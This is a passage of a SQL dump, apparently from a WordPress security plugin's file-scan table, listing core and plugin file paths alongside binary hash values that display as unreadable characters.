Y����7L�Kt','wp-admin/css/deprecated-media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uְ�Z�l�\"�','�����K��ṥ�=���$�ϻ���]�C�i','',0,'?'),('��.��9��q��+�oA','wp-content/plugins/redirection/locale/json/redirection-it_IT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÇE\\�9���x��ڬ','�z���\0[5iǟFX{_��I��`��M��F','',0,'?'),('����T��D��F�K1�','wp-admin/css/media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������ԭ��-p�[','�Bd7-Nd}�Y���l�b[6C��F��\n\r4~>','',0,'?'),('���d{W,��	�\0\Z�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kX�Zb����5��','[\0N����E�g����gd�q\r����*\'I�','',0,'?'),('��WH����4�J�jZ','wp-admin/maint/index.php',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��/GΞӶ[�ǜ��C','wp-admin/js/gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C*���?�4�k��&-s','�v2�UW�n�4V�[an�*�?����X��','',0,'?'),('���n�1�u`z�@ң�','wp-content/plugins/wp-cerber/languages/wp-cerber-de_CH.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W����������Sۨ��','M4#\\���g�ZK��2���=�Y��h\'�\\','',0,'?'),('���[�/�9}�`:w�P','license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��{�\0S�g��D���','��ы��I<�m�db�}��̑x��V�5/����','',0,'?'),('��v���K:�ZF','wp-includes/blocks/site-tagline/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˂1c�Z�>�R �EJm','��U)�}�$EMb0mCTA�0\\pN2�O^','',0,'?'),('���7�%�̬���&�','wp-includes/css/dist/block-library/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'B�Y�����+','�+����O���wA�c�9�8����','',0,'?'),('�\0�����.}�fwA','wp-includes/date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n[*(Ҿ�w.m�y�z�','�.��\0�qB_]������\0��a�}��\0�','',0,'?'),('�B�x)e\\e�{�W�t','wp-admin/includes/fm.php',0,'�?Oj~\'	�o-=��Y�','�?Oj~\'	�o-=��Y�','k\0D��_S�\'��	N�w)(�H$���<0��6�','',0,'?'),('�[���QH\"pS1Ȫ�c','wp-admin/images/arrows-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� Q�}��ydb#6�','�,c�˿\Z�i(~���)����\'��8[A�/�I��x','',0,'?'),('�k���j���r-�|%','wp-content/plugins/redirection/models/redirect/redirect-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fU4��zV���\rS:','J�����m���?��-@�j�)�T���d','',0,'?'),('�kLǤe���(�ȸK','wp-content/plugins/wp-cerber/assets/flags/ch.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�k�g�iT���I�ކ','R���:�=b���U|O@��R�˂}��-','',0,'?'),('��[ixT�q��~Wv�e','wp-admin/network/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�JY��Fq�^��N�','z��w�iL�_�*�	!$c��L*�T�qDN_','',0,'?'),('��F~���y�c7v-','wp-includes/js/customize-preview-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������447\"-�n��','v\\�y��pw��w�.�VDCi�Ĝ����ע','',0,'?'),('��޸��Ѥ;D���','wp-content/plugins/wp-cerber/assets/flags/jp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Jn@��Aל^�','��7���^qU���` ��	�}wͧ�h��','',0,'?'),('�䑖�w�7:\'�h*','wp-includes/js/dist/vendor/lodash.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����C`�]1~������','׳[�p:�	�z���K�QWw�t}H��I�(	�','',0,'?'),('��i�%���o�)�#��\\','wp-includes/blocks/image/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&_\"s�����x','?QF��<%�NVg�-ţ`L:�\n������','',0,'?'),('���2���:�����','wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b4�\'��&��','ۼ�4P\'���hN�a�>���E�5ఛ','',0,'?'),('�M�}�n�\"4jd�R��','wp-includes/blocks/post-template/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�����M�}\\�','K�.�c�~�������[&\'��1�S�S���','',0,'?'),('�\Z-��x7�(A�4���','wp-includes/js/swfupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�`�^�-�o�QWz','��:)��6�a\"3r��\rP\rN�4�yJ�ַ��U�q','',0,'?'),('�,:���3�չ�C@�~�','wp-content/plugins/wordfence/modules/login-security/classes/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�a�b�vr�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('�1W;c�����N�\"�u','wp-includes/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/o^ѳ\":�?~R�O','�\no��.�k�p+��x�����g7 ��A<Q7,��','',0,'?'),('�J��B�GT�;,l��T','wp-includes/images/smilies/icon_exclaim.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\\��>5�\0r���sg�','�L�ɵ�H��A(�xʓ2�EP%�	��#���#�5','',0,'?'),('�V�^�3��m6�._P','wp-includes/customize/class-wp-customize-background-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�@�t��j23��W','�4���0^+�u*�:ޓ4q[#��O��m�&�','',0,'?'),('�q2t�rۗ,]s*r�','wp-includes/blocks/audio/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5���3�yb�A�','��@,BW/�R-�M�w�›�����]ٻ','',0,'?'),('�����[���D?_�[�','wp-includes/random_compat/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4������Տ��d�','�I�n��6��_����ga8��y��].��','',0,'?'),('���7�M3š�$��','wp-includes/images/smilies/icon_question.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[-\0�\'��W��F','�7b��|6#����9/?x��~��[��%t','',0,'?'),('����2@�k�w>K�2','wp-includes/feed-atom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Y~g��l�w��6r�:','!�I��m\nY��f+̕�P\0����13�\\=��','',0,'?'),('����H\0ۙ��h�C��','wp-admin/css/colors/ectoplasm/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+��i-B����\n\\','�M�:�u�,�)�Y&K�\"�W^��F��8��b�','',0,'?'),('��wt�H���-s�\0�n','wp-includes/js/wplink.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!{�TW�V����','�@e�{F� o���`+5p�Q\'+�eC���','',0,'?'),('���=֬H�@-i��','wp-includes/css/admin-bar-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q$E{ XKK�Fq�Ԛf>','�<��ھWmP�|������K�v���\rmz','',0,'?'),('�֔��ߚy(qD�w�','wp-content/plugins/wordfence/models/common/wfGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YJs@j���r�jtm','�3ÑѲs��\r&�z=���ds��pJx�3�w','',0,'?'),('��(B�A!��������','wp-includes/theme-templates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�y��X�w\n��Dm','8\\ң�H�x\\%��R�l`����g�.i�g','',0,'?'),('��-\'f�ߕ?X:4\r!','wp-includes/blocks/table/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"9�T�ʳ��H��','�mX�4����3�ӈ�&�;a�����\"0�z','',0,'?'),('��h�L���JH�X#0','wp-content/plugins/wordfence/lib/wfUnlockMsg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�c)��Re�Y�l�7��','.�`�i�W�	t1�}�sty�ɪ���!K','',0,'?'),('��h�_��-�\rus{t�','wp-content/plugins/wp-cerber/assets/flags/bd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_R�jQ�k.��4','k�j8�F��/���)�5��aC�,�12O�H\'','',0,'?'),('���^��\'�q���0��','wp-links-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ln��j�\\w�X=7I','7���\"1j��L?9Y�\"��&���kŌVD�|��','',0,'?'),('�%n��Tߒ	^�gXΰ','wp-admin/js/inline-edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	�����L','��Lu�D�t\\ShM�j-���X�v���4#�Q','',0,'?'),('�3��aD�w�P����q','wp-admin/includes/class-theme-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڪ&��텾��U�7y','��-R��RlG���cR�K��������a:���*>','',0,'?'),('�C݆w�\r��f� �\\�','wp-content/plugins/wp-cerber/languages/wp-cerber-sr_RS.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rD���.֡h�-�','`�A�\"��f�*�B2$e �Vr�̜��3��','',0,'?'),('�L(,�.����ZP/:�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('�m`��5\n+��7��','wp-includes/blocks/search/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��\0�X`��<�x\ra*7','Oܼ~k�!�À]�*���*cDD)W+�p%F�','',0,'?'),('��n&���n�!崬�','wp-admin/css/site-icon.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�ˁx�J��TG���','�+���W���V��3�(qF���r;�|^�@��','',0,'?'),('��{���{8B%@\0�x�','wp-includes/blocks/post-featured-image/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8MJ� ��.�\'��,�','#�{F2��y7l�B����\Z���ɿ��9D','',0,'?'),('����EX���|T��','wp-includes/blocks/media-text/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������D�Bj��>�','����F�u�~�^�_2\n�TE��G^1-Gae','',0,'?'),('��]j�l�\'��/x5','wp-includes/js/wp-sanitize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:k���E�t6Q��','yΦV�� }ɛq����K>ۈP6��*��C\ns}','',0,'?'),('���W��{�\\,�Yu�','wp-includes/js/jquery/ui/effect-explode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���i!1��	�','s��e=\'���ڜ�N�I�{�U�!�M�E�s','',0,'?'),('��71���}\n��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�2+;�F���нNM��','�w��\"�*��5�U T@��nyȳ�^a�u��\'','',0,'?'),('�,�{�vF��ߝ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('�2X69G3�\Z�+}A�6','wp-content/plugins/wordfence/views/waf/option-whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.������ #�v�}','�i���$��h�}�ws�������X��2�c','',0,'?'),('�5����\r��k��','wp-admin/js/color-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_����;\Z���5�','\n��m��m^�G&%�\0�SKm��Y2p����#','',0,'?'),('�8�������P5aĨ�	','wp-includes/images/smilies/icon_wink.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e?2���i����','�(���V��{�V�Bk����o(`Z��V	6','',0,'?'),('�F5x�z8��KpY��','wp-content/plugins/wordfence/css/diff.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܀g	��	�$���`r�Q','��$��hEJ^54<$�ӭYc���’�&','',0,'?'),('�����y85���æb�','wp-admin/css/colors/sunrise/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dh�P2\r��1A��KW','f��<mݨ�=f�3�>qD����3@>���Á�','',0,'?'),('��L��Ί�6�7m���','wp-content/plugins/wp-cerber/languages/wp-cerber-zh_CN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.1۠�R���g{�tJ','�*�^��BiΔ�>C�����F]���3��','',0,'?'),('��l�3.	XN�','wp-includes/Requests/Exception/HTTP/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v���ڮ�V�3���','�I�l�E�K�Ѧ��?Z�0JT�����U�','',0,'?'),('��{�1u�.b}κ0$�','wp-content/plugins/wp-cerber/assets/flags/bi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',|��\\_��27�k��	','v����JȢ�\"DWK�9q	�Q�^F%a�A','',0,'?'),('��<���)�\"���vY4','wp-includes/blocks/verse/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��\Z���J�.�c����','!�wN��.v���v�8[�DW�	$�_��W55','',0,'?'),('����PQ�E|E}7+','wp-admin/includes/class-wp-filesystem-ftpsockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a��:s�]2�','u�� �:��,&�F@G��*컮&�����W��','',0,'?'),('��U���$�\\*�1^�S�','wp-includes/js/jquery/ui/effect-clip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��=�����:�	s','��tw�:��o,�u3Mxm���x�H ��gC��','',0,'?'),('����P�J�t��1z','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��wU ��ې6M�\\�8','<����\0�\rIB=\"�P8D�\"�����L~�I[','',0,'?'),('����_�� �\0*�O','wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��u��tu�+]�a','�\n�1�IJ��A��P3����C\0{K7QO��f�','',0,'?'),('��P\Z��/���l%�','wp-includes/js/jquery/jquery.hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��hI�QLZA$Un�H�','��T����f�RMS�9º��MDR��R��N�','',0,'?'),('�\0� ��k~��U5T','wp-includes/widgets/class-wp-widget-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q�?J����fQ</�','���]ȧK�a6	�����W}t��HlŲ�0T','',0,'?'),('�	J.�\'��Vn{�|�T�','wp-content/plugins/wp-cerber/assets/bgwidget.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PM6ev����3���','��F.�F��3��r5�e�*\rl��������3\r','',0,'?'),('�\n%f[!aE�r�tg�i','wp-includes/images/media/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����u�h����q��','DBU����MiO�b�,���e��=��W�{���','',0,'?'),('�&�S짿o�$�0�n','wp-includes/author-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';:,)5�����`&\0�','UI��Li�p�p\\�ڐT�[o���/K#(����','',0,'?'),('�?8Rm�ТE7h��<�','wp-includes/blocks/buttons/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�.�$B�\\&����','u���+Ek��~�n���xGz�y�f�gK','',0,'?'),('�G�|$p֠+(�','wp-admin/js/tags-box.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g4i�e��ڠ�Y,׃','u,�tsn��`�b�$�D�r�FRS��r�ґ�^\"','',0,'?'),('�H��ɪ\Z퟽4��ͻ','wp-content/plugins/wp-cerber/assets/flags/cl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�Q�a�A�ߜ����',' I���ײ|01aK�ը�r%բ�(ظlR�','',0,'?'),('�Q����ԁ�2�7u�L','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���3y����1��','	}��N�	<�v���B�S%�s\\���S�','',0,'?'),('�R��B�p��m�Z�;','wp-includes/css/dist/block-editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GI����U�4,�Iϴ','zvk�m�g,���\0NM�.��,	�%��ү','',0,'?'),('�UA�Q�,U���q���','wp-includes/blocks/pullquote/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��\0��%�\\���','Wӂ��,e�l�A��52.��,N��P��$Q','',0,'?'),('�y�Hz��\"�\\����','wp-content/plugins/wp-cerber/assets/flags/tl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�/`�3˸:��Ldlj','q\0HP��+���m �l�K��(��H�','',0,'?'),('�o�j����y��V','wp-content/plugins/wordfence/lib/menu_tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9����V���>�1','����%���6�i���;K2P����>�}�','',0,'?'),('��Ca�s�]��n�/��','wp-includes/css/dist/block-library/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�?�M�u���N','�c-7E��)i+���$�=�c�E+Inݽ�-��e�','',0,'?'),('��Ѻ�\"�P5��^U�\Zi','wp-admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�	Ki\Zb+GZ��B','\r9�cgfĊ�T�v��S(�9IE�$�pH��','',0,'?'),('��m���z4�L��K','wp-admin/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('��wF��ȶ���# �','wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��o�}�$\Z�X�','��EʕG��!�ܷ�[�~r��:��\'O�','',0,'?'),('����A�G,��<���','wp-includes/js/jquery/ui/effect-fade.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*Bz��L��','�j�fD�G��=c�Fs㏽���~�쉹X','',0,'?'),('����8#i�j�g�m,�','wp-content/plugins/redirection/locale/redirection-en_CA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʒ�zs(�SL@2v�M','����8<����Z�˝������8����sox','',0,'?'),('�����հ	̋�Ȳ�S','wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q*ZZ�sq���A}p�','?L\0e}���z4�t,�N)^�Q����À۲','',0,'?'),('� �n�$��q��^qf��','wp-includes/images/smilies/icon_lol.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����:ѷ&����(�','�l�1�Hq�.�2�x��󢾉$�Y�\Z8�','',0,'?'),('�$gJ����O��=�','wp-content/plugins/redirection/locale/redirection-lv.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`T<A*�z�!?��fS','ky\"ŇcƠ��/_�DV}\\�ے2�4_��l','',0,'?'),('�\'^�D��IG�1��!','wp-includes/ms-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m@�)����','�Jl�גC���s�_DnƊ\\\Z.���Xz�','',0,'?'),('�(���Ϲ��ز���','wp-includes/blocks/video/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,V�%�ξ���]','S*���q$�2x��e�߹�<�e�{���=#�4�','',0,'?'),('�*T�u\r�����~�m','wp-admin/css/colors/ocean/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��03���qgP\"J�#','t#�O|z��Ы�{o�@����YW�~��[[�c�','',0,'?'),('�1l<� t~L�Uw�','wp-includes/class-wp-locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�P�<�#��\0�\':','�D��n]����AW�EH�O�H�@�hAD}','',0,'?'),('�4\nR����c8_sVuA','wp-content/plugins/redirection/models/url/url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�\\\r�QD�*/��f1','���f���n��zG5Vf��	�O��v#�� _','',0,'?'),('�E-j��1j��\r�E�','wp-includes/registration-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q<۾\Z7�M�v��','Kd���_�MF� X��X�.,\'T\\��6���6','',0,'?'),('�]oM�se��J4�','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o���h5��\rxܖN','6y\Zu�υ;�	�0�~�rs1J�9��X���J���','',0,'?'),('�`�h�sY%3d��d','wp-content/plugins/redirection/matches/language.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�d�з��d$�','���m\n\"֩�]��&���A\"y��Ԓ��n2�\"}','',0,'?'),('�f ��r�p�(��p�$�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('�g�K�;�qF�VI}�Q�','wp-includes/Requests/Exception/HTTP/416.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HLt&לk$*A�i�ŷ','�(��mybV�aI�jWp���(!A����<(�X','',0,'?'),('�he��M]�BӱS�˜�','wp-content/plugins/redirection/models/fixer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�~�2�9lm�A���','	W~k�S�����:7����),5�X�k(5c�','',0,'?'),('�������<�x�B�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Em/��','�MT�g(���ھӈ:�r,E��0�$�9�XH�','',0,'?'),('��e�-��Rȉ���L:�','wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�Z��O�;�m�#�','�v�̀��O��=��n��u�#�}��զ`�4�W�','',0,'?'),('����##Ցn\ndA\\�e','wp-includes/blocks/latest-comments/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0\'���q4�PS���','��@܎�iSt�\r�-���u�,w��*�n�3','',0,'?'),('��p?E^�@�\'��PE�','wp-admin/edit-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=[\'��N�Ԍ0{��\'�','�j�罚;���Ob�69�Y�5\rVj�|N3�','',0,'?'),('������U�\\��a�E','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��ͱ��r0��؅=�','?E�%��+�����w�\r�^�֗.$�i�$[W','',0,'?'),('���i��֯1�o�R!','wp-content/plugins/wp-cerber/assets/flags/fm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=KbF�!X�ټh[�(@','/������ˆ�_S��L��`ZI�I(1���','',0,'?'),('�B����!��vݡɶ','wp-content/plugins/wordfence/views/onboarding/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zz�#uv��\0���','��}���|IR€�v�J�%-�/\n�V���','',0,'?'),('�)+�‰��]gg�','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Bold.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fѭ�,Uz�1�h','���\Z��ûF�n\ZJ��Opm�O���nD�J+','',0,'?'),('�<��(��*A]�O�','wp-admin/css/colors/ocean/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʥ�Gz�1[��yԆ��','^hK�\'�[��?m�>V#�kD��\Z;�V��h�','',0,'?'),('�D��d.P˴{-yo�g','wp-content/plugins/wordfence/views/common/status-warning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kR�f,�J���k�','��f�!��\rWe��=?��K���jP&�*y�|','',0,'?'),('�I|�K9�(�{s�X','wp-content/plugins/wordfence/lib/menu_scanner_credentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}����\0���\Z�̿�','|�?b~����ڬ��(�ʹ׺;l�G9��','',0,'?'),('�N\"�,�_�	3���B�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-misc-options-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�B���4�H׫','i�썚<X�\'hw�4E�u�*\\���xQ��7�','',0,'?'),('�a�ͮ�(�o��:`','wp-content/plugins/wp-cerber/assets/flags/dm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�<�-�.��w','��h*W̕|l�0jhWp:���z��[V,','',0,'?'),('�bv��E��H���΄','wp-includes/js/wp-lists.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M4���KYs:��ȫ�','󩶓����Z-3w�Eї\rqK]��3�]��.X','',0,'?'),('�hS����:���`','wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�+C#+|�fZ���]�','kn\Zy�&��_��[��Igl�(�g\'�^�G','',0,'?'),('���&��N�,���6P','wp-admin/images/icons32-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*04�G4F�	&Z�i}\"','�.a�}��hw�6�WEʭ�(3�Jӭ�9�E�','',0,'?'),('�д��\0N莦v�\n=t','wp-content/plugins/wp-cerber/assets/flags/cz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cR��}S������J�','�m*1\"�vl�ř:\\��f����?.�؟i��\0�','',0,'?'),('��v��#q���ȃ�','wp-includes/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EOxٕX�2떭؃','x��aJN�!e���\"\"Nq�}�AMC�1)��{�j','',0,'?'),('��W31��N���gפ��','wp-includes/js/dist/vendor/react.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jB���e�}����\"\Z','�g��+_u<!�\'��[��N�b�r��c�>;','',0,'?'),('��x[�e��>M�','wp-admin/includes/edit-tag-messages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m-I�f3�f\\Z��','u�-h�yjL��!z�V���-1�nyFY�Ý�&�','',0,'?'),('�������1�!��N','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�\Zb�ZF���l\r^�','wp-content/plugins/redirection/locale/redirection-fr_CA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�1]�hu�7;�@�','0�D�+��5G�S���\n�@�G�XQ��\0°','',0,'?'),('�q�h���Bc�92��','wp-admin/network/site-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bh@�Uj՟���G��\'{','9;#���l+��9���\"��p�LŢ�ۈ�|','',0,'?'),('��n1.Óu�t���lX','wp-admin/css/colors/modern/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~i�����+We7�WQ�','!��L��?����O#�W�BpdA��NmpcW>','',0,'?'),('����`%��{��+��','wp-content/plugins/wordfence/images/icons/error128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�%7�!��.�','{h\0,�]�z�k�V�{җ�6nG\n�x��s9�','',0,'?'),('���v��\\Q���-��','wp-includes/js/tinymce/plugins/hr/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	%>�)���•;��','؃F��S�[k���&�f� 6+�b�>��','',0,'?'),('��t��h�	,Gx�\"M','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��R�N\Zb8M�g�|','{�����R�tH}��ܧYQ��{�F\Z�H�','',0,'?'),('�ƚ�ŏH�Wn�\'i�','wp-content/plugins/wp-cerber/assets/goo-translate.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�c�\"C�!